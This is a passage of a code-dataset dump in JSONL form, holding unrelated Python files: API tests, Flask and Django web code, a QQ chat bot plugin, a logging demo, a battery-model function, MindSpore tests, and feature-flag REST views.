100\n\t\tresponse = get_votes_by_person('400357', n=str(n), offset=str(offset))\n\t\tmeta = response['meta']\n\t\tvotes = response['objects']\n\t\tself.assertEqual(meta['limit'], n)\n\t\tself.assertEqual(meta['offset'], offset)\n\t\tself.assertTrue(12000 < meta['total_count'])\n\t\tself.assertEqual(len(votes), n)\n\t\tself.assertEqual(votes[0]['person']['firstname'], 'Bernard')\n\t\tself.assertEqual(len(votes[0]), 9)\n\t\tself.assertEqual(len(votes[0]['vote']), 25)\n\n\nclass TestGetVotingRecord(unittest.TestCase):\n\n\tdef test_get_voting_record_for_person(self):\n\t\trecord = get_voting_record(person_id='400357')\n\t\tself.assertEqual(len(record), 100)\n\n\tdef test_get_voting_record_for_person_and_bill(self):\n\t\trecord = get_voting_record(person_id='400357', bill_id='339957')\n\t\tself.assertTrue(9 <= len(record))\n\t\tself.assertEqual(len(record[0]), 5)\n\n\tdef test_get_voting_record_for_person_and_vote(self):\n\t\trecord = get_voting_record(person_id='400357', vote_id='118137')\n\t\tself.assertEqual(len(record), 1)\n\t\tfor v in record:\n\t\t\tself.assertEqual(v['person_id'], 400357)\n\t\t\tself.assertEqual(v['vote_id'], 118137)\n\n","sub_path":"tests/test_vote.py","file_name":"test_vote.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"625488229","text":"# -*- coding: utf-8 -*-\nfrom 
flask import Blueprint, request\nfrom ..libs.web_help import ops_render, iPagination\nfrom ..Config import settings\nfrom ..Model.Comment import Comment\nfrom sqlalchemy import or_\nroute_comment = Blueprint('comment', __name__, url_prefix='/comment')\n\n\n@route_comment.route(\"/index\")\ndef index():\n resp_data = {}\n req = request.values\n page = int(req['p']) if ('p' in req and req['p']) else 1\n query = Comment.query\n if 'mix_kw' in req:\n rule = or_(Comment.content.ilike(\"%{0}%\".format(req['mix_kw'])), Comment.uid.ilike(\"%{0}%\".format(req['mix_kw'])), Comment.rid.ilike(\"%{0}%\".format(req['mix_kw'])))\n query = query.filter(rule)\n\n if 'status' in req and int(req['status']) > -1:\n query = query.filter(Comment.status == int(req['status']))\n\n page_params = {\n 'total': query.count(),\n 'page_size': settings.PAGE_SIZE,\n 'page': page,\n 'display': settings.PAGE_DISPLAY,\n 'url': request.full_path.replace(\"&p={}\".format(page), \"\")\n }\n\n pages = iPagination(page_params)\n offset = (page - 1) * settings.PAGE_SIZE\n list = query.order_by(Comment.id.desc()).offset(offset).limit(settings.PAGE_SIZE).all()\n\n resp_data['list'] = list\n resp_data['pages'] = pages\n resp_data['search_con'] = req\n resp_data['status_mapping'] = settings.STATUS_MAPPING\n resp_data['current'] = 'index'\n return ops_render(\"comment/index.html\", resp_data)\n\n@route_comment.route(\"/blacklist\")\ndef blacklist():\n resp_data = {}\n req = request.values\n page = int(req['p']) if ('p' in req and req['p']) else 1\n query = Comment.query\n\n query = query.filter(Comment.status == -9999)\n\n page_params = {\n 'total': query.count(),\n 'page_size': settings.PAGE_SIZE,\n 'page': page,\n 'display': settings.PAGE_DISPLAY,\n 'url': request.full_path.replace(\"&p={}\".format(page), \"\")\n }\n\n pages = iPagination(page_params)\n offset = (page - 1) * settings.PAGE_SIZE\n list = query.order_by(Comment.id.desc()).offset(offset).limit(settings.PAGE_SIZE).all()\n\n resp_data['list'] = list\n resp_data['pages'] = pages\n resp_data['search_con'] = req\n resp_data['status_mapping'] = settings.STATUS_MAPPING\n resp_data['current'] = 'blacklist'\n return ops_render(\"comment/blacklist.html\", resp_data)\n\n","sub_path":"Backend/Web/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"164390943","text":"import pymongo\nimport json\nfrom pymongo import MongoClient\nfrom MHConsulter import *\n\nclient = MongoClient(\"localhost\", 27017)\ndb = client[\"mi-db\"]\n\n# Name\nprint(\"Nombre de la DB: \", db.name)\nprint(client.list_database_names())\n\nresultado = MHConsulter()\nresultado.setItemAilments()\nresultado.setAilmentId(\"6\")\nresultado.construirPeticion()\nresultado.ejecutarPeticion()\nresultado.transformText()\n\nprueba = resultado.serializationJson()\nprueba = json.dumps(prueba)\nprueba2 = json.loads(resultado.serializationJson())\n\n# Crea colección e inserta un registro\nprint(db.pet.insert_many([prueba2]))","sub_path":"Ene-Jun-2021/perez-arroyo-jose-fernando/Parcial_2/Practica_2/Parte 2/Insertar.py","file_name":"Insertar.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"551438437","text":"from nonebot import on_command, on_message, on_notice\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.cqhttp import Bot, Message, GroupMessageEvent, Event\nfrom .utils import to_me, 
get_path, scheduler\nfrom tinydb import TinyDB, Query\nimport time\nimport random\nimport re\n\n\nd_lim = TinyDB(get_path('temp.json'), encoding='utf-8').table(\"d_lim\")\nlimqq = Bot.config.limqq\nrepeat_msg_dict = {}\n\n# 复读\nrepeat = on_message(priority=5)\n@repeat.handle()\nasync def repeat_fun(bot: Bot, event: GroupMessageEvent, state: T_State):\n global repeat_msg_dict\n msg = str(event.get_message())\n groupid = event.group_id\n if groupid in repeat_msg_dict.keys():\n if repeat_msg_dict[groupid][0] == msg:\n repeat_msg_dict[groupid][1] += 1\n # 复读次数大于等于5 则加入复读\n if repeat_msg_dict[groupid][1] >= 5:\n del repeat_msg_dict[groupid]\n if random.random() > 0.1:\n await repeat.finish(Message(msg))\n else: # 有几率打断复读\n await repeat.finish('打断复读!')\n else:\n repeat_msg_dict[groupid] = [msg, 1]\n else:\n repeat_msg_dict[groupid] = [msg, 1]\n\n\n# 每日每个群捕捉一次lim\ncatch_lim = on_message(priority=5)\n@catch_lim.handle()\nasync def catch_lim_fun(bot: Bot, event: GroupMessageEvent, state: T_State):\n q = Query()\n if event.get_user_id() == str(limqq):\n if not(d_lim.contains(q.groupid == event.group_id) and d_lim.get(q.groupid == event.group_id)['d'] is True):\n msg = \"[CQ:reply,id=\" + str(event.message_id) + \"]\" + \\\n \"莉姆🤤嘿嘿.......莉姆🤤嘿嘿......莉姆🤤嘿嘿.......莉姆🤤嘿嘿......莉姆🤤嘿嘿.......莉姆🤤嘿嘿......\"\n if not d_lim.contains(q.groupid == event.group_id):\n d_lim.insert({'groupid': event.group_id, 'd': True})\n else:\n d_lim.update({'groupid': event.group_id, 'd': True}, q.groupid == event.group_id)\n await catch_lim.finish(Message(msg))\n\n\n# 5点重置dlim\n@scheduler.scheduled_job('cron', hour='5', minute='0', id='clear_d_times')\nasync def clear_d_times():\n d_lim.update({'d': False})\n\n\n# 晚安语音\ngood_night = on_command('晚安', rule=to_me(), priority=5)\n@good_night.handle()\nasync def send_good_night(bot: Bot, event: GroupMessageEvent, state: T_State):\n hour = time.localtime().tm_hour\n if hour >= 22 or hour <= 2:\n fil = re.compile(u'[^0-9a-zA-Z\\u4e00-\\u9fa5.,,。?“”]+', re.UNICODE)\n name = fil.sub(' ', event.sender.card) or fil.sub(' ', event.sender.nickname)\n message = fil.sub(' ', name) + \",晚安。\"\n message = Message('[CQ:tts,text=' + str(message) + ']')\n await good_night.finish(message)\n elif 17 <= hour < 22:\n message = \"才\" + str(hour - 12) + \"点。\"\n message = Message('[CQ:tts,text=' + str(message) + ']')\n await good_night.finish(message)\n\n\n# 群友发消息时随机戳一戳\npoke = on_message(priority=5)\n@poke.handle()\nasync def random_poke(bot: Bot, event: GroupMessageEvent, state: T_State):\n if random.random() < 0.006:\n message = Message('[CQ:poke,qq=' + str(event.get_user_id()) + ']')\n time.sleep(10)\n await poke.finish(message)\n","sub_path":"src/plugins/haruka_bot/auto_msg.py","file_name":"auto_msg.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"4500152","text":"# -*- coding: utf-8 -*-\n\nfrom django import template\n\nfrom admin_interface.models import Theme\n\n\nregister = template.Library()\n\n\n@register.assignment_tag(takes_context = True)\ndef get_admin_interface_theme(context):\n\n theme = None\n request = context.get('request', None)\n\n if request:\n theme = getattr(request, 'admin_interface_theme', None)\n\n if not theme:\n theme = Theme.get_active_theme()\n\n if request:\n request.admin_interface_theme = theme\n\n return 
theme\n\n","sub_path":"admin_interface/templatetags/admin_interface_tags.py","file_name":"admin_interface_tags.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"246580398","text":"class BinarySearchTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n # Insert the given value into the tree\n def insert(self, value):\n # If inserting, we must already have a tree/root\n if self.value is None:\n self.value = value\n return self.value\n # If value is less than self.value, go left, make a new tree/node, if empty. Otherwise, keep going (recursion)\n elif value < self.value:\n if self.left:\n return self.left.insert(value)\n else:\n self.left = BinarySearchTree(value)\n # If greater than or equal to self.value, go right, make a new tree/node, if empty. Otherwise, keep going (recursion)\n elif value >= self.value:\n if self.right:\n return self.right.insert(value)\n else:\n self.right = BinarySearchTree(value)\n\n # Return True if the tree contains the value\n # False if it does not\n def contains(self, target):\n # if target == self.value, return it\n if target == self.value:\n return True\n # otherwise, go left or right based on smaller or bigger\n elif target > self.value and self.right:\n # move right\n return self.right.contains(target)\n elif target < self.value and self.left:\n # move left\n return self.left.contains(target)\n return False","sub_path":"names/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"290173106","text":"#!/usr/bin/env python3.9\n\nfrom os.path import isfile\nfrom typing import Literal\n\nfrom bot import ROOT_DIR, SRBpp\n\nTOKEN_FILE: Literal[str] = f\"{ROOT_DIR}/token\"\n\n\ndef check_files() -> None:\n\t\"\"\"\n\tMake sure all required files are present.\n\t\"\"\"\n\tif not isfile(TOKEN_FILE):\n\t\ttoken = input(\"BOT SETUP - Enter bot token: \")\n\t\twith open(TOKEN_FILE, \"w+\", encoding=\"utf-8\") as f:\n\t\t\tf.write(token)\n\n\ndef _start() -> None:\n\t\"\"\"\n\tThe genesis function.\n\t\"\"\"\n\tcheck_files()\n\tbot = SRBpp()\n\tbot.run()\n\n\nif __name__ == \"__main__\":\n\t_start()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"202564582","text":"\"\"\"\nhttps://github.com/Delgan/loguru\npip3 install loguru\n\"\"\"\nimport sys\n\nfrom loguru import logger\n\nlogger.add(sink=\"file_1.log\",\n level=\"INFO\",\n rotation=\"500 MB\",\n compression=\"zip\",\n retention=\"100 days\",\n # backtrace=False\n )\n\n\n@logger.catch\ndef my_function(x, y, z):\n # An error? 
It's catched anyway!\n return 1 / (x + y + z)\n\n\nconfig = {\n \"handlers\":[\n {\"sink\":sys.stdout, \"format\":\"{time} - {message}\"},\n {\"sink\": \"file_2.log\", \"serialize\": True}\n ]\n}\nlogger.configure(**config)\n\nif __name__ == \"__main__\":\n # logger.add(sys.stderr, format=\"{time} {level} {message}\", level=\"INFO\")\n\n logger.debug(\"That's it, beautiful and simple logging!\")\n logger.info(\"info\")\n print(my_function(0, 0, 0))\n\n new_level = logger.level(\"SNAKY\", no=38, color=\"\", icon=\"🐍\")\n\n logger.log(\"SNAKY\", \"Here we go!\")\n\n logger.info(\"=---\",{\"1\":1})\n\n # import notifiers\n\n # params = {\n # \"username\": \"you@gmail.com\",\n # \"password\": \"abc123\",\n # \"to\": \"dest@gmail.com\"\n # }\n\n\n # # Send a single notification\n # notifier = notifiers.get_notifier(\"email\")\n # notifier.notify(message=\"The application is running!\", **params)\n #\n # # Be alerted on each error message\n # from notifiers.logging import NotificationHandler\n #\n # handler = NotificationHandler(\"email\", defaults=params)\n # logger.add(handler, level=\"ERROR\")\n # print(my_function(0, 0, 0))\n\n\n","sub_path":"LanguageBasic/log_demo/loguru_demo.py","file_name":"loguru_demo.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"268170146","text":"'''\nTask Coach - Your friendly task manager\nCopyright (C) 2004-2008 Frank Niessink \n\nTask Coach is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nTask Coach is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. 
If not, see <http://www.gnu.org/licenses/>.\n'''\n\nimport wx\nfrom taskcoachlib import meta\nfrom taskcoachlib.widgets import sized_controls\nfrom taskcoachlib.i18n import _\nfrom taskcoachlib.domain import date\nfrom taskcoachlib.gui import render\n\n\nclass ReminderDialog(sized_controls.SizedDialog):\n snoozeChoices = [_(\"Don't snooze\"), _('Five minutes'), _('Ten minutes'),\n _('Fifteen minutes'), _('Half an hour'), _('One hour'),\n _('Two hours'), _('24 hours')]\n snoozeTimes = [date.TimeDelta(minutes=minutes) for minutes in \\\n (0, 5, 10, 15, 30, 60, 120, 24*60)]\n \n def __init__(self, task, *args, **kwargs):\n kwargs['title'] = kwargs.get('title', meta.name + ' ' + _('Reminder'))\n super(ReminderDialog, self).__init__(*args, **kwargs)\n self.task = task\n self.openTaskAfterClose = False\n pane = self.GetContentsPane()\n pane.SetSizerType(\"form\")\n wx.StaticText(pane, label=_('Task') + ':')\n self.openTask = wx.Button(pane, label=self.task.subject(recursive=True))\n self.openTask.Bind(wx.EVT_BUTTON, self.onOpenTask)\n for label in _('Reminder date/time') + ':', \\\n render.dateTime(self.task.reminder()), _('Snooze') + ':':\n wx.StaticText(pane, label=label)\n self.snoozeOptions = wx.ComboBox(pane)\n for choice, timeDelta in zip(self.snoozeChoices, self.snoozeTimes):\n self.snoozeOptions.Append(choice, timeDelta)\n self.snoozeOptions.SetSelection(0)\n self.SetButtonSizer(self.CreateStdDialogButtonSizer(wx.OK))\n self.Bind(wx.EVT_BUTTON, lambda event: self.Close())\n self.Fit()\n\n def onOpenTask(self, event):\n self.openTaskAfterClose = True\n self.Close()\n\n\n","sub_path":"branches/Release0_72_Branch/taskcoachlib/gui/dialog/reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"643151472","text":"from pybamm import tanh\n\n\ndef lico2_ocp_Dualfoil1998(sto):\n \"\"\"\n Lithium Cobalt Oxide (LiCO2) Open Circuit Potential (OCP) as a a function of the\n stochiometry. The fit is taken from Dualfoil [1]. Dualfoil states that the data\n was measured by Oscar Garcia 2001 using Quallion electrodes for 0.5 < sto < 0.99\n and by Marc Doyle for sto<0.4 (for unstated electrodes). We could not find any\n other records of the Garcia measurements. Doyles fits can be found in his\n thesis [2] but we could not find any other record of his measurments.\n\n References\n ----------\n .. [1] http://www.cchem.berkeley.edu/jsngrp/fortran.html\n .. [2] CM Doyle. 
Design and simulation of lithium rechargeable batteries,\n 1995.\n\n Parameters\n ----------\n sto : :class:`pybamm.Symbol`\n Stochiometry of material (li-fraction)\n\n \"\"\"\n\n stretch = 1.062\n sto = stretch * sto\n\n u_eq = (\n 2.16216\n + 0.07645 * tanh(30.834 - 54.4806 * sto)\n + 2.1581 * tanh(52.294 - 50.294 * sto)\n - 0.14169 * tanh(11.0923 - 19.8543 * sto)\n + 0.2051 * tanh(1.4684 - 5.4888 * sto)\n + 0.2531 * tanh((-sto + 0.56478) / 0.1316)\n - 0.02167 * tanh((sto - 0.525) / 0.006)\n )\n\n return u_eq\n","sub_path":"pybamm/input/parameters/lithium-ion/positive_electrodes/lico2_Marquis2019/lico2_ocp_Dualfoil1998.py","file_name":"lico2_ocp_Dualfoil1998.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"443659215","text":"import requests\nimport json\n\n\n# 封装采用json编码格式的请求\n\nclass myrequests:\n\n def __init__(self, url):\n self.url = url\n self.header = {'content-type': 'application/json'}\n\n def myget(self):\n try:\n r = requests.get(self.url)\n return r.text, r.status_code\n except Exception as e:\n print('post请求出错,原因:%s' % e)\n\n def mypost(self, param):\n try:\n data = json.dumps(param)\n r = requests.post(self.url, data=data, headers=self.header,stream=True, verify=False)\n json_response = json.loads(r.text)\n return json_response\n except Exception as e:\n print('post请求出错,原因:%s' % e)\n\n\n# obj = myrequests('http://10.1.219.12:7017/ad/resetPWD')\n# data = {\n# \"id\":\"992200\",\n# \"newPwd\":\"Mw123456\"\n# }\n# res = obj.mypost(data)\n# print(res)\n# print(type(res))\n","sub_path":"util/Httprequests.py","file_name":"Httprequests.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"479114858","text":"import numpy as np\n\nN, B, K = map(int, input().split())\nC = list(map(int, input().split()))\nMOD = 10 ** 9 + 7\n\n# DP の漸化式が同じ場合は, 行列の繰り返し二乗法によって求めることができる\n# numpy を使う場合は, np.int32 ではoverflowが起こるので, 'dtype=object' を指定する\n# numpy 実装による高速化の恩恵がない?\ndef power_matrix_under_mod(mat, n, p):\n res = np.identity(B, dtype=object)\n bi = str(format(n, \"b\")) # 2進表現に\n for i in range(len(bi)):\n res = np.dot(res, res)\n res = np.mod(res, p)\n if bi[i] == \"1\":\n res = np.dot(res, mat)\n res = np.mod(res, p)\n return res\n\n\n# 行列の累乗を行う\ndp_matrix = np.zeros((B, B), dtype=object)\nfor b in range(B):\n for c in C:\n b_ = (10 * b + c) % B\n dp_matrix[b][b_] += 1\n\nprint(power_matrix_under_mod(dp_matrix, N, MOD)[0][0])\n","sub_path":"pysol/005-02.py","file_name":"005-02.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"371274750","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\nimport pytest\nimport mindspore.dataset as ds\nfrom mindspore import log as 
logger\n\nDATASET_FILE = \"../data/mindrecord/testGraphData/testdata\"\n\n\ndef test_graphdata_getfullneighbor():\n g = ds.GraphData(DATASET_FILE, 2)\n nodes = g.get_all_nodes(1)\n assert len(nodes) == 10\n nodes_list = nodes.tolist()\n neighbor = g.get_all_neighbors(nodes_list, 2)\n assert neighbor.shape == (10, 6)\n row_tensor = g.get_node_feature(neighbor.tolist(), [2, 3])\n assert row_tensor[0].shape == (10, 6)\n\n\ndef test_graphdata_getnodefeature_input_check():\n g = ds.GraphData(DATASET_FILE)\n with pytest.raises(TypeError):\n input_list = [1, [1, 1]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], 1]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, 1, 1]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1, 1], [1, 1]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, [1, 1]]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [[1, 1], 1]]\n g.get_node_feature(input_list, [1])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, 1]]\n g.get_node_feature(input_list, 1)\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, 1]]\n g.get_node_feature(input_list, [\"a\"])\n\n with pytest.raises(TypeError):\n input_list = [[1, 1], [1, 1]]\n g.get_node_feature(input_list, [1, \"a\"])\n\n\nif __name__ == '__main__':\n test_graphdata_getfullneighbor()\n logger.info('test_graphdata_getfullneighbor Ended.\\n')\n test_graphdata_getnodefeature_input_check()\n logger.info('test_graphdata_getnodefeature_input_check Ended.\\n')\n","sub_path":"tests/ut/python/dataset/test_graphdata.py","file_name":"test_graphdata.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570571251","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 2 11:29:05 2018\n\n@author: Mr_Mey\n\"\"\"\n\nfrom connector import Connector\nfrom grid.grid import Grid\nfrom decision import Actor\n\nimport os\nimport time\nimport struct\n\n\nactor = Actor()\n\nos.popen(\"VampiresVSWerewolvesGameServer.exe\")\n\nname = 'paul'\n\nconn = Connector(\"127.0.0.1\",5555)\n\n# envoit sequence NME\nconn.send(\"NME\".encode()+struct.pack(\"1B\",len(name))+name.encode())\n\n# recoit commande SET\nSet = conn.receive()\n# initialise la carte\ngrid = Grid(Set[1][0],Set[1][1])\n\n# recoit HME --inutile mais il faut quand même le recevoir\nconn.receive()\n# recoit HME --inutile mais il faut quand même le recevoir\nconn.receive()\n\n# \nMap = conn.receive()\ngrid.update_all_groups(Map[1])\n\n# tant que la partie est active\nwhile conn.connected:\n \n # ecoute le serveur\n order = conn.receive()\n if order[0] == \"UPD\":\n #update la grille\n grid.update_all_groups(order[1])\n print(\"map {}\".format([grid.height,grid.width]))\n elif order[0] == \"BYE\":\n # to do clean break\n break\n elif order[0] == \"END\":\n # to do clean break\n break\n \n # take decision\n actor.action(grid)\n \n # envoyer file d'actions au serveur\n conn.send(actor.send_moves())\n # vider la file d'action pour prochain tour\n actor.clean_moves()\n # attendre une seconde pour visualiser sur .exe\n time.sleep(2)\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 
+{"seq_id":"488862256","text":"'''\nQuestion:\nDefine a class with a generator which can iterate the numbers, which are divisible by 7, between a given range 0 and n.\n'''\n\n\nclass Exercice20:\n def divisible_by_7(self, n):\n for i in range(0, n + 1):\n if i % 7 == 0:\n yield i\n\n\nex = Exercice20()\nfor i in ex.divisible_by_7(100):\n print(i)\n","sub_path":"ex20.py","file_name":"ex20.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"291761555","text":"from threading import Thread\n\nimport coreapi\nfrom rest_framework import status, viewsets\nfrom rest_framework.generics import GenericAPIView, get_object_or_404\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.schemas import AutoSchema\n\nfrom analytics.utils import track_event\nfrom environments.models import Environment, Identity\nfrom projects.models import Project\nfrom .models import FeatureState, Feature\nfrom .serializers import FeatureStateSerializerBasic, FeatureStateSerializerFull, \\\n FeatureStateSerializerCreate, CreateFeatureSerializer, FeatureSerializer, \\\n FeatureStateValueSerializer\n\n\nclass FeatureViewSet(viewsets.ModelViewSet):\n queryset = Feature.objects.all()\n\n def get_serializer_class(self):\n if self.action == 'create':\n return CreateFeatureSerializer\n else:\n return FeatureSerializer\n\n def get_queryset(self):\n project = Project.objects.get(pk=self.kwargs['project_pk'])\n return project.features.all()\n\n\nclass FeatureStateViewSet(viewsets.ModelViewSet):\n \"\"\"\n View set to manage feature states. Nested beneath environments and environments + identities\n to allow for filtering on both.\n\n list:\n Get feature states for an environment or identity if provided\n\n create:\n Create feature state for an environment or identity if provided\n\n retrieve:\n Get specific feature state\n\n update:\n Update specific feature state\n\n partial_update:\n Partially update specific feature state\n\n delete:\n Delete specific feature state\n \"\"\"\n\n # Override serializer class to show correct information in docs\n def get_serializer_class(self):\n\n if self.action not in ['list', 'retrieve']:\n return FeatureStateSerializerCreate\n else:\n return FeatureStateSerializerBasic\n\n def get_queryset(self):\n \"\"\"\n Override queryset to filter based on provided URL parameters.\n \"\"\"\n environment_api_key = self.kwargs['environment_api_key']\n identifier = self.kwargs.get('identity_identifier')\n environment = Environment.objects.get(api_key=environment_api_key)\n\n if identifier:\n identity = Identity.objects.get(\n identifier=identifier, environment=environment)\n else:\n identity = None\n\n return FeatureState.objects.filter(environment=environment, identity=identity)\n\n def get_environment_from_request(self):\n \"\"\"\n Get environment object from URL parameters in request.\n \"\"\"\n environment = Environment.objects.get(\n api_key=self.kwargs['environment_api_key'])\n return environment\n\n def get_identity_from_request(self, environment):\n \"\"\"\n Get identity object from URL parameters in request.\n \"\"\"\n identity = Identity.objects.get(identifier=self.kwargs['identity_identifier'],\n environment=environment)\n return identity\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n Override create method to add environment and identity (if present) from URL parameters.\n \"\"\"\n data = request.data\n environment = 
self.get_environment_from_request()\n data['environment'] = environment.id\n\n if 'feature' not in data:\n error = {\"detail\": \"Feature not provided\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\n feature_id = int(data['feature'])\n\n if feature_id not in [feature.id for feature in environment.project.features.all()]:\n error = {\"detail\": \"Feature does not exist in project\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\n if self.kwargs.get('identity_identifier', None):\n identity = self.get_identity_from_request(environment)\n data['identity'] = identity.id\n\n serializer = FeatureStateSerializerBasic(data=data)\n if serializer.is_valid():\n feature_state = serializer.save()\n headers = self.get_success_headers(serializer.data)\n\n if 'feature_state_value' in data:\n self.update_feature_state_value(feature_state.feature_state_value,\n data['feature_state_value'], feature_state)\n\n return Response(FeatureStateSerializerBasic(feature_state).data,\n status=status.HTTP_201_CREATED, headers=headers)\n else:\n error = {\"detail\": \"Couldn't create feature state.\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\n def update(self, request, *args, **kwargs):\n \"\"\"\n Override update method to always assume update request is partial and create / update\n feature state value.\n \"\"\"\n feature_state_to_update = self.get_object()\n feature_state_data = request.data\n\n # Check if feature state value was provided with request data. If so, create / update\n # feature state value object and associate with feature state.\n if 'feature_state_value' in feature_state_data:\n feature_state_value = self.update_feature_state_value(\n feature_state_to_update.feature_state_value,\n feature_state_data['feature_state_value'],\n feature_state_to_update\n )\n\n if isinstance(feature_state_value, Response):\n return feature_state_value\n\n feature_state_data['feature_state_value'] = feature_state_value.id\n\n serializer = FeatureStateSerializerBasic(feature_state_to_update, data=feature_state_data,\n partial=True)\n serializer.is_valid(raise_exception=True)\n self.perform_update(serializer)\n\n if getattr(feature_state_to_update, '_prefetched_objects_cache', None):\n # If 'prefetch_related' has been applied to a queryset, we need to\n # refresh the instance from the database.\n feature_state_to_update = self.get_object()\n serializer = self.get_serializer(feature_state_to_update)\n\n return Response(serializer.data)\n\n def partial_update(self, request, *args, **kwargs):\n \"\"\"\n Override partial_update as overridden update method assumes partial True for all requests.\n \"\"\"\n return self.update(request, *args, **kwargs)\n\n def update_feature_state_value(self, instance, value, feature_state):\n feature_state_value_dict = feature_state.generate_feature_state_value_data(\n value)\n\n feature_state_value_serializer = FeatureStateValueSerializer(\n instance=instance,\n data=feature_state_value_dict\n )\n\n if feature_state_value_serializer.is_valid():\n feature_state_value = feature_state_value_serializer.save()\n else:\n return Response(feature_state_value_serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n return feature_state_value\n\n\nclass SDKFeatureStates(GenericAPIView):\n serializer_class = FeatureStateSerializerFull\n permission_classes = (AllowAny,)\n\n schema = AutoSchema(\n manual_fields=[\n coreapi.Field(\"X-Environment-Key\", location=\"header\",\n description=\"API Key for an Environment\"),\n coreapi.Field(\"feature\", 
location=\"query\",\n description=\"Name of the feature to get the state of\")\n ]\n )\n\n def get(self, request, identifier=None, *args, **kwargs):\n if 'HTTP_X_ENVIRONMENT_KEY' not in request.META:\n error = {\"detail\": \"Environment Key header not provided\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\n environment_key = request.META['HTTP_X_ENVIRONMENT_KEY']\n environment = Environment.objects.select_related('project', 'project__organisation').get(api_key=environment_key)\n\n if identifier:\n track_event(environment.project.organisation.name, \"identity_flags\")\n\n identity, _ = Identity.objects.get_or_create(\n identifier=identifier,\n environment=environment,\n )\n else:\n track_event(environment.project.organisation.name, \"flags\")\n identity = None\n\n kwargs = {\n 'identity': identity,\n 'environment': environment,\n }\n\n if 'feature' in request.GET:\n kwargs['feature__name__iexact'] = request.GET['feature']\n try:\n if identity:\n feature_state = identity.get_all_feature_states().get(\n feature__name__iexact=kwargs['feature__name__iexact'],\n )\n else:\n feature_state = FeatureState.objects.get(**kwargs)\n except FeatureState.DoesNotExist:\n return Response(\n {\"detail\": \"Given feature not found\"},\n status=status.HTTP_404_NOT_FOUND\n )\n\n return Response(self.get_serializer(feature_state).data, status=status.HTTP_200_OK)\n\n if identity:\n flags = self.get_serializer(\n identity.get_all_feature_states(), many=True)\n return Response(flags.data, status=status.HTTP_200_OK)\n\n environment_flags = FeatureState.objects.filter(**kwargs).select_related(\"feature\", \"feature_state_value\")\n return Response(\n self.get_serializer(environment_flags, many=True).data,\n status=status.HTTP_200_OK\n )\n\n\ndef organisation_has_got_feature(request, organisation):\n \"\"\"\n Helper method to set flag against organisation to confirm that they've requested 